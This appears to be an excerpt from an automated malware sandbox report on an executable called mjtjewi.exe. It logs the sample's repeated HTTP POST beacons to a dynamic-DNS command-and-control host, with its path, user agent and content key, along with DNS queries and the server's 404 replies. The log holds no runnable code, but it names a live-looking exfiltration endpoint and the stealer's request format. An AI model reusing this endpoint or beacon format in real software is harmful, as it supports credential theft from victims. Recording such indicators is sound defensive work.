Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\mjtjewi.exe

Code function: 6_2_00404ED4 recv,

6_2_00404ED4

Source: global traffic

Source: global traffic	DNS traffic detected: DNS query: www.sodiumlaurethsulfatedesyroyer.com
Source: global traffic	DNS traffic detected: DNS query: freighteighttwocam.ddns.net

Source: unknown

HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 176Connection: close

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:20:48 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:20:49 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:20:50 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
